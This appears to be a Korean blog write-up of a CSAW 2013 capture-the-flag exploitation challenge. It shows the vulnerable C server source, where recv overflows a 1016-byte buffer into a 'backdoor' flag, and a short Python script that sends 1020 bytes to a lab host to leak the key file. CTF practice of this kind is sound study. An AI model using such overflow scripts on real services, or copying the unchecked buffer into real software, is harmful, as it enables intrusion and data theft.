반응형
소스가 주어진 문제였다고 한다.. IDA 로 분석해봣는데 따로 특별한것 또한 없엇다 바로 공격 시도
[source]
void handle(int newsock) {
int backdoor = 0;
char buffer[1016];
memset(buffer, 0, 1016);
send(newsock, "Welcome to CSAW CTF.", 21, 0);
recv(newsock, buffer, 1020, 0);
buffer[1015] = 0;
if ( backdoor ) {
fd = fopen("./key", "r");
fscanf(fd, "%s\n", buffer);
send(newsock, buffer, 512, 0);
}
close(newsock);
}
[attack]
root@symnoisy:~/csaw2013# cat go.py
from socket import *
from struct import pack,unpack
p=lambda x:pack("<l",x)
up=lambda x:unpack("<l",x)[0]
host = "192.168.72.148"
port = 31337
attack = "A"*1020
s=socket()
s.connect((host,port))
print s.recv(1024)
s.send(attack)
print s.recv(1024)
s.close()
반응형
'과거의 컴퓨터 공부 > etc..' 카테고리의 다른 글
csaw2013 exploit 300 (0) | 2014.09.15 |
---|---|
CSAW2013 exploit 200 (0) | 2014.09.11 |
,